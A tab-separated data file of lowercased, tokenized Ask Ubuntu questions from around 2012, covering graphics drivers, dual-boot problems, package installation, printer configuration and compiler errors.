163976	how can i install boost-devel in ubuntu 12.04 ?	i want to compile flvtool++ , but it requires boost-devel libraries . i tried to install it via this command : sudo apt-get install boost-devel but i got the error : e : unable to locate package boost-devel is there an other way to compile flvtool++ source or any 64-bit binaries ?
163978	how to run two monitors on two diffrent nvidia cards ?	the problem i have is that the graphic cards are old and i cant install it correctly lspci| grep vga 01:00.0 vga compatible controller : nvidia corporation nv18 [ geforce4 mx 440 agp 8x ] ( rev a2 ) 02:01.0 vga compatible controller : nvidia corporation nv34 [ geforce fx 5500 ] ( rev a1 ) i think i need nvidia-173 . the following packages have unmet dependencies and it wo n't let me install this . is this possible running 12.04 ? would like to run both .
163981	enable parcellite indicator in ubuntu 12.04	is it still possible to enable the parcellite indicator in ubuntu 12.04 ? i 've noticed that the indicator no longer shows up when i launch parcellite . is there a workaround for this ?
163982	run 12.04 from usb with no hard disk usage	using a 32gb usb flash drive , can i install ubuntu 12.04 on it and run usb on various computers without interfacing with any of their hard drives ? i want to take care to not disturb anything on my windows 7 system drive ( `` c '' ) or any of my four data drives .
163990	apt package for 11.04 for python 2.7.3 ?	i want to upgrade python on my 11.04 server from python 2.7.1 to python 2.7.3 . i assumed that if i did an apt-get install python2.7 that 2.7.3 would have automatically been available and would have updated . but instead i get : $ sudo apt-get install python2.7 python2.7 is already the newest version . is there a different repository i need to get it from ? or is it not ported to 11.04 ? i want some education on which packages and versions are available for previous ubuntu versions .
163991	removing a directory named after a file	i 've been looking for a code snippet to place in a .sh that removes a directory named after a file . what i mean by this is i would like to move to specify a directory and then search it for a list of files of type `` .xxx '' and then remove any subdirectories ( with contents ) with the same name . pseudo code of what i want to do : find names all files of type .xxx within a directory find and remove all subdirectories with names that equal the file names found how would one best go about this ? i have been looking at the find function , which i will be using before this function to unrar archives : `find . -name `` *.rar '' -exec unrar x ' { } ' \ ; `
163992	how can i get unity to show the menu icons in inkscape ?	i use ubuntu 12.04 and i have enabled icons in menus . everything works fine except inkscape that shows a lot of `` missing '' icons . what is wrong and how can i fix it ?
163993	how do i automatically restart docky after a crash ?	docky crashes from time to time for me . how can i make it restart automatically after it crashed ?
164000	low display resolution under ubuntu 12.04	i had some problem after installing new drivers for nvidia . after having followed the instructions answered to this question , i now only have the nouveau open-source driver . i can have access to my desktop , but i 'm stuck with a 640x480 ( 4:3 ) resolution . no other resolution is proposed in the dropdown list of the `` displays '' utility . i tried installing the two nvidia drivers suggested in the `` additional drivers '' utility , but each one broke my display again . now that i have reverted back to nouveau again , what should i do to get a higher resolutionâ ?
164001	cenon will not open or run but complains about a missing library	the subtext here is that i 'm trying to see if i can run any gnustep applications in a reasonable way on my ubuntu 12.04 system . i went to the package list ( http : //packages.ubuntu.com/precise/allpackages ) and sort of chose cenon at random . i installed it via sudo apt-get install cenon.app then i attempted to run it from the command line by typing cenon to the command line ( bash ) prompt . i immediately got this message in an alert panel saying : you need to install the cenon library ! in short , i have duplicated jorge castro 's experience under ubuntu 11.10 . ( he reported it in this forum in cenon will not open or run about 6 months ago . ) i imagine that either the dependencies in the package are not complete , or perhaps the code is misinterpreting some signal it has gotten . i 'd be glad to install some more software to see if that helps ( and provides enough information for the package maintainer to fix it ) . thanks in advance for any info ! dan postscript ! so , i already have egg on my face , i guess . in fact , the alert panel does come up , but it turns out that i can just close it and proceed . however , there still seems to be some problem in running the application . the menus do n't show up in the right places , sometimes . so , for example , if i click to open the files submenu , it may line up with the main menu , but sometimes it does n't . i also had that experience with another gnustep application i installed this morning , adun.app . ( for anybody wishing to try it out , you install it via `` sudo apt-get install adun.app '' but run it via ul . ) so probably my question should be re-posed to deal with menu/submenu alignment .
164008	does ubuntu 12.04 support the intel h65m chipset/celeron b800 cpu ?	i 'm gon na buy a laptop i want to install ubuntu on it . samsung // model : np300e4z-a04cl // processor : intel celeron b800 1,5 ghz // cores : 2 // chipset : h65m // 2gb ddr3 // video : intel hd graphics , integrated // wifi : 802.11bgn i 've been searching for hours to know if everything will work ! but i ca n't find anything about ubuntu 12.04 running in it ... i just want a fast system for my office work , skype , external screens ... any benchmark or experience about if this laptop will work fine under ubuntu 12.04 would be highly apreciated ! !
164009	windows 7 wo n't boot after ubuntu 12.04 dual boot installation failed	i basically used a liveusb i had made of ubuntu 12.04 to try and dual boot both os ' . but it crashed at the partitioning stage and now windows 7 wo n't boot . g parted shows the same partitions that windows 7 had before . it also has an exclamation mark next to the main partition . i tried to fix the windows booting issue with a windows 7 installation disk but it does n't do anything at the `` press any key stage '' . please help i really need to access the windows 7 partition . thanks
164010	how to partition my hard drive for ubuntu use ?	till now i was windows user . from now on i want to use only linux . i have 500gb hdd . how do i partition it properly ? i read that there is no right or wrong way , but still , i am confused . i did something and i have primary partition mounted on / ( 160gb ) which i believe is a os and 350gb extended partition of which i have 4gb of swap and 346gb mounted on /home . i got used to c : \ and d : \ partitioning , but i do n't see file system in that way . i am lost . where is what ? how can i make c : \ partition for os and d : \ for apps , movies , music , photos . or what i want is windows way and i have to get used to linux way ?
164012	404 can not update natty multiverse	it first happend about a week ago that i received this error message the first time . it shows up daily . w : failed to fetch http : //de.archive.ubuntu.com/ubuntu/dists/natty/multiverse/source/sources 404 not found [ ip : 141.30.13.30 80 ] , e : some index files failed to download . they have been ignored , or old ones used instead . i can do updates from other ppa as usual . i noticed that problem in relation to special ppa defined by the user , but i ca n't imagine that natty 's multiverse could be down for days . is there something i can check on my system to solve this ?
164026	unable to delete file - no such file or directory	how can i delete a file that is there but the system says is not there ?
164027	i ca n't install any software using software-center in 12.04	i ca n't install any software using software-center in 12.04 , i just can install some sofware if i run software-center as root , i put some messages below . teste @ ghost66 : / $ software-center 2012-07-15 18:47:51,343 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2012-07-15 18:47:51,360 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2012-07-15 18:47:52,711 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2012-07-15 18:47:53,227 - softwarecenter.ui.gtk3.app - info - show_available_packages : search_text is '' , app is none . 2012-07-15 18:47:53,362 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) 2012-07-15 18:48:17,665 - softwarecenter.ui.gtk3.app - info - software-center-agent finished with status 0 2012-07-15 18:48:17,666 - softwarecenter.db.database - info - reopen ( ) database 2012-07-15 18:48:17,667 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2012-07-15 18:51:55,683 - softwarecenter.backend - warning - _on_trans_error : org.freedesktop.policykit.error.failed : ( 'system-bus-name ' , { 'name ' : ':1.285 ' } ) : org.debian.apt.install-or-remove-packages 2012-07-15 18:55:18,326 - softwarecenter.backend - warning - daemon dies , ignoring : < apttransaction object at 0x59afcd0 ( aptdaemon+client+apttransaction at 0x651fb80 ) > exit-failed 2012-07-15 18:55:18,328 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( )
164038	why do intel hd3000 graphics show as `` unknown '' on my lenovo b570 ?	well as it says in the question title , i 'm running a lenovo-b570 , i have an intel hd graphics 3000 integrated card , and inside the graphics thing it says unknown , and standard experience , i have tried doing other things i have seen on askubuntu but , once i get other drivers to show up , it starts to get choppy , and a lot of my drivers stop working , not to mention my sidebar icons and such go invisible ... and even then second life would n't work and kept saying that i do n't meet the required specs and such . could someone help me out please ?
164039	how to download streaming video from a flash player ( arte ) ?	there are a couple of concerts that i would very much like to view from arte ( i think it 's a french tv channel ? ) but my connection is not good enough to stream the video . how can i download the file to play it locally ? here is an example link : http : //www.my-jazzlive.tv/ ? p=1862 i have tried popular browser plugins such as downloadhelper and flash video downloader , these are working fine for me on sites such as youtube but they do n't seem to recognise any stream from the arte video player . i also looked through /tmp for something that looks like a partially downloaded video , but no luck .
164041	regaining ubuntu partition from windows 7 which is inside logical partition	i 've installed ubuntu a long time ago , but after re-installing windows 7 , i have n't been able to use ubuntu . now i want to regain that hard drive space that ubuntu was using . how do i remove my ubuntu partition from windows 7 and reuse the space ? an important point : the partition is inside the logical partition.the picture is given below : http : //postimage.org/image/4qg9i0dpp/
164042	ubuntu - win7 dualboot failure ?	i switched back to windows 7 for a while after installing and using ubuntu 12.04 on a regular basis . i decided to reinstall ubuntu using a flash drive i had used for it last time . the flash drive i am using is a verbatim 16gb , with a 2gb fat16 partition i made to use install ubuntu . the problem occurred when i installed ubuntu alongside win7 . after installing `` successfully '' , i rebooted my computer without my flash drive in and was expecting to be greeted by a boot menu asking whether or not i wanted to boot in to windows 7 or ubuntu . instead , i was greeted by a black screen with a blinking underscore as if it was waiting for me to provide input . i pressed a button on my keyboard and it returned something along the lines of `` a bootable device was not detected -- please insert boot disk and press a key . '' the system boots fine in too ubuntu while my flash drive is plugged in a usb port . i have tried to look to see whether my windows partition is still intact using the gparted tool . ubuntu ca n't find anything for `` gparted '' . i went to the software center to try and install , but it apparently does n't exist after i click `` more info '' . i am hoping that windows 7 is still intact , and that ubuntu can be installed normally .
164043	can the amazon kindle work with my ubuntu hotspot ?	i wanted to use my ubuntu laptop here as a hotspot for my kindle ( v3.3 ) but when i scan the wireless network on my kindle and select to connect to the ubuntu wireless hotspot , then my kindle says its an unsupported wi-fi network : enterprise or peer-to-peer wi-fi networks are not supported ... what can i do to make it work , my laptop has a intel pro/wireless 2200bg [ calexico2 ] eth1 wired connection : - interface : ethernet ( eth0 ) - driver : 8139too ipv4 - ip address : 192.168.0.29 - broadcast adr : 192.168.0.255 - subnet mask : 255.255.255.0 - default route and prim dns : 192.168.0.1
164044	intallation of netgear n300 wireless adapter on dell latitude d830	can anybody assist me with installing a netgear n300 wireless adapter ? i 've read you need the windows driver for it , but how do you get the windows driver ? i 've got the cd , but it wont run .
164045	changing the log out sound	i would like to change the log out sound in ubuntu 12.04 . is there a command for the terminal so this script can be edited ?
164051	how do i install ubuntu on a compaq presario v2000 ?	i am trying to install ubuntu 12.04 on compaq presario v2000 ( old laptop ) . having specifications 1.40 ghz intel celeron processor ,40 gb hdd , 760 mb ram . all the system requirements for ubuntu 12.04 are met with the laptop . i downloaded the os iso image and created a bootable cd , after i turn the laptop on it boots from the cd fine , when i click on install it starts to install then a minute or two after that the dots below the word ubuntu are all orange and nothing is happening . it just hangs there . anyone got an answer for me ? all help will be appreciated .
164054	correct way to install nvidia-173 driver on ubuntu 12.04 ?	after chasing around an unfortunate bug wherein my dell 's nvidia geforce fx 5200 requires a driver other than either nouveau or nvidia-current , i came across this : https : //bugs.launchpad.net/ubuntu/+source/nvidia-graphics-drivers-173/+bug/948053 trouble is i 'm not certain how to proceed from here - and i 'm also really , really cautious about doing this , because the last two or three times i tried to install drivers for this card i ended up with bad resolution and/or a blank screen , and i did end up reinstalling ubuntu at least once . i 'm fairly positive that there 's no error with the card as it worked under windows xp on the same machine not a month ago , so i believe the error was human . : / what 's the best way to install based on the information in the link above , and if it goes belly up , what 's the right way to reverse it ? i 'm not terribly excited to reinstall again : ) thanks .
164055	gnome 3 not displaying thumbnails ?	i 'm running 12.04 lts and i ca n't seem to see any thumbnails for pictures , videos , anything . i have checked my preferences `` show thumbnails , always , files under 10mb , local only '' which makes sense but still , no thumbails . i was having problems with unity 3d and my nvidia card and i entered a force_unity_start code somewhere . now i got gnome 3 working ( turns out i just had to turn zoom off ) i 'm still having this problem . please advise if you need any more information to help me with this !
164056	how do i combine all lines in a text file into a single line ?	i want to get all lines in a text into one line . i 'm a beginner at coding trying to learn by doing . i 've spent four hours trying to solve this problem . i know there 's a simple solution to this problem . here 's what i 've been trying . sed -e 'n ; s/\n// ' myfile.txt # does nothing sed -e : a -e n -e 's/\n/ / ' -e ta myfile.txt # output all messed up and i ca n't make head nor tail of the syntax cat myfile.txt | tr -d '\n ' > myfile.txt # deletes all lines here 's the text file : 500212 262578-4-4 23200 griffith laboratories ltd griffith laboratories south dublin county council office office ( industrial ) list rateable 2 pineview industrial estate firhouse road knocklyon 31 dec 2007 01 jan 2008 '' i ca n't figure out where i 've gone wrong ... .
164060	is xubuntu as power-efficient as ubuntu ?	i 'm wondering if xubuntu has the same features as ubuntu 12.04 particularly i 'm trying to get the most battery life out of my laptop . does xubuntu 12.04 feature the same improvements to power management that come default in ubuntu 12.04 ? in general , is the difference between xubuntu and ubuntu simply the de ? is all the underlying improvements available in both distros ?
164064	is there an application indicator for cpu usage by core ?	i love system load indicator ( indicator-multiload ) , but it does n't reflect the usage of the individual cpu cores , just the overall cpu usage . sometimes i 'll have an application max out a single core ( ahem , eclipse ) , but when i glance at the cpu usage graph , everything looks acceptable . i know i can just open htop , but the whole point of an application indicator is being able to get the information you want with a glance , not keystrokes . thanks .
164065	does ubuntu one have a payment api ?	do ubuntu one has an payment api , i can integrate in my ubuntu-app ( python ) ? i would use it to add an easy donate dialog . so end user can choose an default monthly donate amount , and how many months it will run for . update : i has contact canonical abort this , and joshua hoover reply : eventually we 'll provide a way to do this but it 's going to be further out in the future . nb : my question/email to canonical was only containing the first tree lines..
164073	dual-ubuntu : how do i disable one os from using the swap partition ?	i have both ubuntu and lubuntu installed on the same machine , on different partitions . they are both used for different things , and i like to hibernate my main ubuntu installation to my single swap partition when i switch between them . however , they are both recognizing the same swap partition , and when i boot into lubuntu after hibernating my ubuntu installation , it tries to load from swap and all hell breaks loose . so i want to try to make lubuntu stop recognizing the swap partition . this is a quad core machine , and swap really is n't needed with lxde .
164078	why is downloading repository updates so slow ?	okay , i have ubuntu version 11.10 and i wish to upgrade to 12.04 . whenever i open the update manager and click `` check , '' it has taken literally over an hour to download the cache . i can not update without checking the cache ; attempts in the console ( as suggested here ) have failed . what do i do in order to update without waiting over three hours to download the entire cache ? or how do i get it to download quicker ? edit : saw this page , it provided no help . just false hope . oh , and no , my internet works just fine ; normally i have a 600kb/s download rate . no dial-up here .
164080	why does 'install-info ' keep warning me about `` lilypond '' ?	i try to install nasm this morning when suddenly i got this message . it would be thankful if someone could explain about whats happening here and what cause the message appear . install-info : warning : no info dir entry in `/usr/share/info/lilypond-learning.info.gz' install-info : warning : no info dir entry in `/usr/share/info/music-glossary.info.gz' install-info : warning : no info dir entry in `/usr/share/info/lilypond-changes.info.gz' install-info : warning : no info dir entry in `/usr/share/info/lilypond-essay.info.gz' install-info : warning : no info dir entry in `/usr/share/info/lilypond-notation.info.gz' install-info : warning : no info dir entry in `/usr/share/info/lilypond-contributor.info.gz' install-info : warning : no info dir entry in `/usr/share/info/lilypond-extending.info.gz' install-info : warning : no info dir entry in `/usr/share/info/lilypond-snippets.info.gz' install-info : warning : no info dir entry in `/usr/share/info/lilypond-usage.info.gz'
164083	arabic disappeared after 12.04 upgrade !	well , i was amongst the 12.04 beta upgraders , and since then i 've lost the ability to write in arabic , and i 've been using ubuntu since 2008 as an only os without any issues , and been upgrading since then as well , except on this machine , which received one upgrade from 11.10 to 12.04 and it got messed up . i 've added arabic like usual , but it does n't change with the keyboard 's short-cut , and when i do it manually with the mouse , then it just does n't work , and it keeps writing in english instead . i 've tried to install some ibus things , and added arabic-kbd ( m17n ) but it still remains messy , let alone not having the same layout , and all i want is to get to normal . so , please , is there any way to reset or initialize these keyboard related settings , so i can get back to normal and stop using the mac just to type in arabic , or so often using xp over vbox ? and please , no re-install option ! i just ca n't backup all my work right now , and there are a lot of tasks waiting for me to get them done . thanks for any kind of support : )
164084	how to record desktop to .flv format ?	i tried to record desktop on ubuntu with 2 tools : recordmydesktop ( http : //recordmydesktop.sourceforge.net/about.php ) kazam screencaster ( https : //launchpad.net/kazam ) but , output video of recordmydesktop is .ogv format ( reference here : http : //diigo.com/0rue2 ) . and ouput video of kazam screencaster is .mp4 and .webm format . i need output video after recording process is .flv format . i do n't want to format them to .flv . how to record desktop to .flv format ?
164087	why ca n't i compile glibc on ubuntu 12.04 ?	i 'm trying to compile the linux from scratch kernel , version 7.1 on ubuntu 12.04 , running inside of a virtualbox . i 've worked through a part of the tutorial successfully , but when i reach step 5.7 : building glibc-2.14.1 , i get an error when i make . in file included from ../sysdeps/unix/sysv/linux/syslog.c:10:0 ../misc/syslog.c : in function '__vsyslog_chk ' : ../misc/syslog.c:144:9 : warning : variable 'prioff ' set but not used [ -wunused-but- set-variable ../misc/syslog.c:123:1 : sorry , unimplemented : inlining failed in call to 'syslog ' : function body not available . ../misc/syslog.c:155:9 : sorry , unimplemented : called from here make [ 2 ] : *** [ /mnt/lfs/sources/glibc-build/misc/syslog.o ] error 1 make [ 2 ] : leaving directory `/mnt/lfs/sources/glibc-2.14.1/misc' make [ 1 ] : *** [ misc/subdir_lib ] error 2 make [ 1 ] : leaving directory `/mnt/lfs/sources/glibc-2.14.1' make : *** [ all ] error 2 after some googling , i saw a filed bug report : http : //sourceware.org/bugzilla/show_bug.cgi ? id=10375 that had the same errors i was seeing , but i could n't divine a solution . any tips on where i should head ?
164093	why do i keep getting `` invalid password '' when trying to log in ?	i have read and tried everything that i can find and i am still having issues logging in . i have ubuntu 11.10 that i have put on my machine a couple of weeks ago and i still can not log in . it says invalid password . so i have tried to reboot and reset . i have even tried to remount . what am i doing wrong ? i am a beginner trying to learn and i am not sure why i can not sign in .
164098	is it possible to use ubuntu as speaker while playing music from a bluetooth-linked smartphone ?	is there a way to use the notebook as speaker for my smartphone ? i linked them via bluetooth and saw that the smartphone can be used as an input-device for music and sound . you can see it here : my smartphone says that the laptop is linked as an audio-system . if i play some music on the smartphone , it is recognized by the audio manager . you can see it in the picture , the bar is active and keep moving to the music . but i ca n't hear anything . how can i get this working ? oh i just forgot : i 'm using ubuntu 12.04 as 64bit on a lenovo y560 and the smartphone has android 2.3.6 best regards
164100	why do n't i have permission to copy to my ext4-formatted external drive ?	i have an external drive that is a few years old and now i wan na format it . i dont know what file system i should use with ubuntu . i tried ext4 , but it gives me a headache when i am trying to copy documents . it says i dont have the permission to copy files there . i dont really wan na use this hard drive with windows computers ... that 's why i decided to go for the ext4 file system . any ideas why i cant copy or what could have gone wrong ?
164102	need help triple booting laptop with jolios	i installed ubuntu 12.04 ( dual boot with windows 7 without wubi ) on a disk partition of only 20 gb . no swap partition , only the root . what i want to do now is triple boot my computer by installing jolios on it . jolios is an ubuntu based cloud disto . little help needed with disk partitioning and grub bootloader .
164103	can not do anything after booting ubuntu 12.04 lts , problem with resolution	i installed the ubuntu on my pc using a different lcd screen and now when i connect it to the monitor that i want to use , i get a problem with the resolution as soon as the ubuntu boots so cant change the resolution from with in the os after booting . the screenshot is in the link . is there any way arroung to solve the problem or i need to re install the ubuntu with the actual monitor plugged in while installing it . i get out of frequency error hf : 68.7 khz vf : 85.0hz operating frequency hf:30-54 khz vf : 50-120 hz after 30 seconds i get a black screen with the cursor blinking for some time and then the monitor shuts off .
164105	ubuntu ssd performance issue	i have installed ubuntu 12.04 on a 55gb adata s599 ssd . i have a asus m4n68t motherboard that does not support ahci . bootup takes a lot longer than expected and working in the system is not even close to an option . is this an ahci issue or is there something else i can try and do ?
164107	chrome versus firefox - which is better ?	perhaps this is not the best title to use , but i 'm running 12.04 , which i always update . i 'm not sure if it is just my impression , but is chrome really buggy ? i generally use the latest updated version . that 's my browser of choice , but it seems to drain my resources and i resorted to firefox instead . any information/comments ? best regards , ederico .
164108	ubuntu 12.04 installation issue	i have hp pavilion g6 laptop . i tried installing ubuntu on it . i successfully downloaded the image and copied it to disc . now i do not understand how to run the setup while my laptop do not boot from that disc . please help me .
164111	cups is always asking for password when printing on a certain printer	when i send print to a network printer ( hp laserjet 2200d ) , cups asks for username/password . it does n't happen with other printers and i 'm sure its a cups issue , because it 's asking the password even if i 'm not connected to the network . here is my /etc/cups/cupsd.conf : # # # sample configuration file for the cups scheduler . see `` man cupsd.conf '' for a # complete description of this file . # # log general information in error_log - change `` warn '' to `` debug '' # for troubleshooting ... loglevel warn # deactivate cups ' internal logrotating , as we provide a better one , especially # loglevel debug2 gets usable now maxlogsize 0 # administrator user group ... systemgroup lpadmin # only listen for connections from the local machine . listen localhost:631 listen /var/run/cups/cups.sock # show shared printers on the local network . browsing off browseorder allow , deny browseallow all browselocalprotocols cups dnssd browseaddress @ local # default authentication type , when authentication is required ... defaultauthtype basic # web interface setting ... webinterface yes # restrict access to the server ... < location / > order allow , deny < /location > # restrict access to the admin pages ... < location /admin > order allow , deny < /location > # restrict access to configuration files ... < location /admin/conf > authtype default require user @ system order allow , deny < /location > # set the default printer/job policies ... < policy default > # job/subscription privacy ... jobprivateaccess default jobprivatevalues default subscriptionprivateaccess default subscriptionprivatevalues default # job-related operations must be done by the owner or an administrator ... < limit create-job print-job print-uri validate-job > order deny , allow < /limit > < limit send-document send-uri hold-job release-job restart-job purge-jobs set-job-attributes create-job-subscription renew-subscription cancel-subscription get-notifications reprocess-job cancel-current-job suspend-current-job resume-job cancel-my-jobs close-job cups-move-job cups-get-document > require user @ owner @ system order deny , allow < /limit > # all administration operations require an administrator to authenticate ... < limit cups-add-modify-printer cups-delete-printer cups-add-modify-class cups-delete-class cups-set-default cups-get-devices > authtype default require user @ system order deny , allow < /limit > # all printer operations require a printer operator to authenticate ... < limit pause-printer resume-printer enable-printer disable-printer pause-printer-after-current-job hold-new-jobs release-held-new-jobs deactivate-printer activate-printer restart-printer shutdown-printer startup-printer promote-job schedule-job-after cancel-jobs cups-accept-jobs cups-reject-jobs > authtype default require user @ system order deny , allow < /limit > # only the owner or an administrator can cancel or authenticate a job ... < limit cancel-job cups-authenticate-job > require user @ owner @ system order deny , allow < /limit > < limit all > order deny , allow < /limit > < /policy > # set the authenticated printer/job policies ... < policy authenticated > # job/subscription privacy ... jobprivateaccess default jobprivatevalues default subscriptionprivateaccess default subscriptionprivatevalues default # job-related operations must be done by the owner or an administrator ... < limit create-job print-job print-uri validate-job > authtype default order deny , allow < /limit > < limit send-document send-uri hold-job release-job restart-job purge-jobs set-job-attributes create-job-subscription renew-subscription cancel-subscription get-notifications reprocess-job cancel-current-job suspend-current-job resume-job cancel-my-jobs close-job cups-move-job cups-get-document > authtype default require user @ owner @ system order deny , allow < /limit > # all administration operations require an administrator to authenticate ... < limit cups-add-modify-printer cups-delete-printer cups-add-modify-class cups-delete-class cups-set-default > authtype default require user @ system order deny , allow < /limit > # all printer operations require a printer operator to authenticate ... < limit pause-printer resume-printer enable-printer disable-printer pause-printer-after-current-job hold-new-jobs release-held-new-jobs deactivate-printer activate-printer restart-printer shutdown-printer startup-printer promote-job schedule-job-after cancel-jobs cups-accept-jobs cups-reject-jobs > authtype default require user @ system order deny , allow < /limit > # only the owner or an administrator can cancel or authenticate a job ... < limit cancel-job cups-authenticate-job > authtype default require user @ owner @ system order deny , allow < /limit > < limit all > order deny , allow < /limit > < /policy > # #
164113	chromium and google chrome continue adding their services to start applications	even i disable or delete the service in startup applications , i found them again on next reboot . i 've noticed the issue as both services eat my cpu in system monitor . it must there be something in applications ' configuration that re-enables autostart someway . can anyone help me to find it out ? chromium about : chromium 18.0.1025.168 ( build 134367 ) ubuntu 12.04 sistema operativo linux webkit 535.19 ( trunk @ 106313 ) javascript v8 3.8.9.19 flash 11.2 r202 user-agent mozilla/5.0 ( x11 ; linux i686 ) applewebkit/535.19 ( khtml , like gecko ) ubuntu/12.04 chromium/18.0.1025.168 chrome/18.0.1025.168 safari/535.19 riga di comando /usr/lib/chromium-browser/chromium-browser -- flag-switches-begin -- flag-switches-end percorso eseguibile /usr/lib/chromium-browser/chromium-browser percorso profilo /home/mauro/.config/chromium/default google chrome about : google chrome 20.0.1132.57 ( build ufficiale 145807 ) sistema operativo linux webkit 536.11 ( @ 122148 ) javascript v8 3.10.8.20 flash 11.3.31.115 user-agent mozilla/5.0 ( x11 ; linux i686 ) applewebkit/536.11 ( khtml , like gecko ) chrome/20.0.1132.57 safari/536.11 riga di comando /opt/google/chrome/google-chrome -- flag-switches-begin -- enable-sync-tabs -- flag-switches-end percorso eseguibile /opt/google/chrome/google-chrome percorso profilo /home/mauro/.config/google-chrome/default
164114	how can i know the source ppa of an installed package ?	i have a package ( xserver-xorg-video-intel ) from ppa sources . since i have more than one ppa sources for this package in my package management i am not sure which one is the source . so i wonder if i can learn this using apt-get or dbpkg etc . related question : if i have various ppa 's for a given package , will apt-get change the ppa if it finds a new version of the package in any ppa ? i am asking since i use an alternative ppa for xserver-xorg-video-intel as the driver in the official one leads to errors in hibernate/sleep .
164118	why does my atheros ar9285 connect at only 65 mbits/sec ?	i have an asus k53e laptop , running ubuntu 12.04 . love it , the only os so far which does n't give me problems ! anyway , my wireless network adapter is pretty much crap . it runs at only 65 mbit/s , while it can handle 300 mbit/s . it 's an atheros ar9285 . i googled around , found suggestions of setting the channel and frequency of my router . so set the 5 ghz band to force 40 mhz and wireless-n , and i set the 2.4 ghz band to choose between 20 and 40 mhz , also forcing wireless-n. my router is a cisco linksys e3200 . when i run a speedtest at speedtest.net , i get 21 mb/s download and an unstable 9 mb/s upload . when downloading an ubuntu iso from a local site i get about 2 mb/s download speed , can be a lot better methinks . is there another way that i can tune up the speed of this card a bit ? or should i get a replacement ( i was looking at the intel 6235 ) , and if i do so , will ubuntu recognize it immediately after install or do i have to install some more stuff ? thanks !
164121	unable to set `` never '' to `` show battery status in menubar '' ?	i am using ubuntu 12.04 with gnome shell . i have tried to remove battery icon from panel using the battery setting in system settings but to no avail . i use an extension called `` system monitor '' which shows the battery properties but when i am removing the battery option in /usr/share/gnome-shell/js/ui/panel.js the `` system monitor '' icon also disappearing . so i tried `` evil status '' but to no avail , also tried sudo apt-get remove idicator-power with out any result . the problem is it is appearing at the moment i plug-out the power connection & not disappearing when i again powering it up . where am i making the mistake ? thanks , mrinal .
164122	how to force firefox to remember passwords ?	in firefox , some passwords i have can not be saved ( i 'm not even asked for that ) , for example fab.com or battle.net how can i make firefox remember those passwords ?
164132	can not compile any c code under xubuntu	i am not a seasoned c programmer , but i compile some c code sometimes . the last time i successfully compiled and run some c code i did it on the same system that i have now ( the very same os on the very same machine , no os deinstallation/reinstallation happened ) . i did that about 2 months ago . now , if i try to compile even a very simple code like this : # include < stdio.h > main ( ) { printf ( `` hello '' ) ; return 0 ; } i get : gcc : error trying to exec 'cc1 ' : execvp : no such file or directory here is the gcc -v -wall output : using built-in specs . target : x86_64-linux-gnu configured with : ../src/configure -v -- with-pkgversion='ubuntu 4.4.3-4ubuntu5.1 ' -- with-bugurl=file : ///usr/share/doc/gcc-4.4/readme.bugs -- enable-languages=c , c++ , fortran , objc , obj-c++ -- prefix=/usr -- enable-shared -- enable-multiarch -- enable-linker-build-id -- with-system-zlib -- libexecdir=/usr/lib -- without-included-gettext -- enable-threads=posix -- with-gxx-include-dir=/usr/include/c++/4.4 -- program-suffix=-4.4 -- e nable-nls -- enable-clocale=gnu -- enable-libstdcxx-debug -- enable-plugin -- enable-objc-gc -- disable-werror -- with-arch-32=i486 -- with-tune=generic -- enable-checking=release -- build=x86_64-linux-gnu -- host=x86_64-linux-gnu -- target=x86_64-linux-gnu thread model : posix gcc version 4.4.3 ( ubuntu 4.4.3-4ubuntu5.1 ) collect_gcc_options='-v ' '-wall ' '-mtune=generic' cc1 -quiet -v h1.c -d_fortify_source=2 -quiet -dumpbase h1.c -mtune=generic -auxbase h1 -wall -version -fstack-protector -o /tmp/ccolexzj.s gcc : error trying to exec 'cc1 ' : execvp : no such file or directory i have no idea what has happened to my system . system status : -- uname -svrmpio : linux 2.6.32-40-generic # 87-ubuntu smp tue mar 6 00:56:56 utc 2012 x86_64 unknown unknown gnu/linux -- lsb_release -rd : description : ubuntu 10.04.4 lts release : 10.04 -- apt-cache policy gcc-4.4 ( i do not know what this command does ) : installed : 4.4.3-4ubuntu5.1 candidate : 4.4.3-4ubuntu5.1 version table : *** 4.4.3-4ubuntu5.1 0 500 http : //se.archive.ubuntu.com/ubuntu/ lucid-updates/main packages 500 http : //security.ubuntu.com/ubuntu/ lucid-security/main packages 500 http : //archive.ualinux.com/ubuntu/ lucid/main packages 100 /var/lib/dpkg/status 4.4.3-4ubuntu5 0 500 http : //se.archive.ubuntu.com/ubuntu/ lucid/main packages -- ls -l /usr/lib/gcc/i486-linux-gnu/4.4/ : ls : can not access /usr/lib/gcc/i486-linux-gnu/4.4/ : no such file or directory -- gcc -- version : gcc ( ubuntu 4.4.3-4ubuntu5.1 ) 4.4.3 -- dpkg -s build-essential : package : build-essential status : install ok installed priority : optional section : devel installed-size : 48 maintainer : ubuntu developers < ubuntu-devel-discuss @ lists.ubuntu.com > architecture : amd64 version : 11.4build1 -- locate cc1 : ( ecryptfs references omitted ) : /usr/lib/gcc/amd64-mingw32msvc/4.4.2/cc1 /usr/lib/gcc/i586-mingw32msvc/4.4.2/cc1 /usr/lib/gcc/x86_64-linux-gnu/4.1/cc1 /usr/lib/gcc/x86_64-linux-gnu/4.3/cc1 /usr/lib/gcc/x86_64-linux-gnu/4.4/cc1 -- edit : env : term=xterm shell=/bin/bash cuda_home=/usr/local/cuda ld_library_path= : /usr/local/cuda/lib64 glade_module_path= : /usr/lib/glade3/modules defaults_path=/usr/share/gconf/xubuntu.default.path xdg_config_dirs=/etc/xdg/xdg-xubuntu : /etc/xdg desktop_session=xubuntu path=/usr/local/cuda/bin : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/cuda/bin gdm_keyboard_layout=us lang=en_us.utf8 mandatory_path=/usr/share/gconf/xubuntu.mandatory.path gdmsession=xubuntu shlvl=1 gtk_path= : /usr/lib/gtk-2.0 xdg_data_dirs=/etc/xdg/xdg-xubuntu : /usr/local/share : /usr/share lessopen=| /usr/bin/lesspipe % s display=:0.0 libglade_module_path= : /usr/lib/libglade/2.0 glade_catalog_path= : /usr/share/glade3/catalogs colorterm=gnome-terminal _=/usr/bin/env -- edit 2 : the compilation command is issued directly in the terminal ( no python or whatever ) . -- gcc -- print-search-dirs : install : /usr/lib/gcc/x86_64-linux-gnu/4.4.3/ 